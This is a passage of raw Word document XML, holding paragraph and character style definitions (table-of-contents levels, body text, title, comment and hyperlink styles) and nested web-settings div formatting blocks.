    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="1440" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a">
    <w:name w:val="À&quot;À"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bullet1">
    <w:name w:val="bullet 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal2">
    <w:name w:val="Normal2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:ind w:left="1440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent2Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="3600" w:hanging="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent2Char">
    <w:name w:val="Body Text Indent 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TEST2">
    <w:name w:val="TEST2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="3600"/>
      </w:tabs>
      <w:ind w:left="3600" w:hanging="2160"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal4">
    <w:name w:val="Normal4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:ind w:left="3168"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentMapChar">
    <w:name w:val="Document Map Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="DocumentMap"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Numbered">
    <w:name w:val="Numbered"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bodyindent2">
    <w:name w:val="body indent 2"/>
    <w:basedOn w:val="BodyTextIndent"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="1440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bodyindent3">
    <w:name w:val="body indent 3"/>
    <w:basedOn w:val="bodyindent2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="2160"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText2Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText2Char">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00B82F63"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="BodyTextIndent"/>
    <w:link w:val="BodyText3Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="2160"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText3Char">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent3Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="1080"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent3Char">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Attachment">
    <w:name w:val="Attachment"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="RevisionHistory">
    <w:name w:val="Revision History"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A0091A"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00A0091A"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SIGNATUREBOX2">
    <w:name w:val="SIGNATURE BOX 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00345468"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="7938"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:smallCaps/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextCenter">
    <w:name w:val="Body Text Center"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00345468"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PCBodyTextCenter">
    <w:name w:val="*PC_Body Text Center"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00345468"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TITLEBOX1">
    <w:name w:val="TITLE BOX 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00345468"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
      <w:b/>
      <w:smallCaps/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SIGNATUREBOX1">
    <w:name w:val="SIGNATURE BOX 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00345468"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="7938"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:b/>
      <w:smallCaps/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B82F63"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B82F63"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00B82F63"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00C60E6B"/>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ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="001F4BE4"/>
    <w:pPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005970D6"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ms-sitemapdirectional">
    <w:name w:val="ms-sitemapdirectional"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005970D6"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00140E71"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00006DBC"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text6854font1">
    <w:name w:val="text6854font1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA2395"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="38"/>
      <w:szCs w:val="38"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text6854font2">
    <w:name w:val="text6854font2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA2395"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text6854font5">
    <w:name w:val="text6854font5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA2395"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00226554"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00A317C7"/>
    <w:pPr>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:bCs/>
      <w:color w:val="365F91"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A71B87"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00271429"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="007D317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4450508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1013845029">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="25762589">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="40323772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1763259979">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1160582577">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="690835020">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1380015599">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
